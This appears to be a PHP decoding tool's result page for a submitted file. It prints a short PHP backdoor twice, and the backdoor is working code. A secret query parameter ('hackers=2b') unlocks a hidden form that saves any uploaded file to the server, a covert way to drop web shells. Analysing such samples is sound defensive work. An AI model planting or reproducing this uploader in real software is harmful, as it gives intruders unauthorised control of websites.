Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<!-------------------------- Name: Site: http://blog.weili.me Mail: [email protected]..
Decoded Output download
<!--------------------------
Name:
Site: http://blog.weili.me
Mail: [email protected]
QQ: 56..
---------------------------->
<?php
if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?>
Did this file decode correctly?
Original Code
<!--------------------------
Name:
Site: http://blog.weili.me
Mail: [email protected]
QQ: 56..
---------------------------->
<?php
if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?>
Function Calls
None |
Stats
MD5 | cf01cb6e09ee594545693c5d327bdd50 |
Eval Count | 0 |
Decode Time | 116 ms |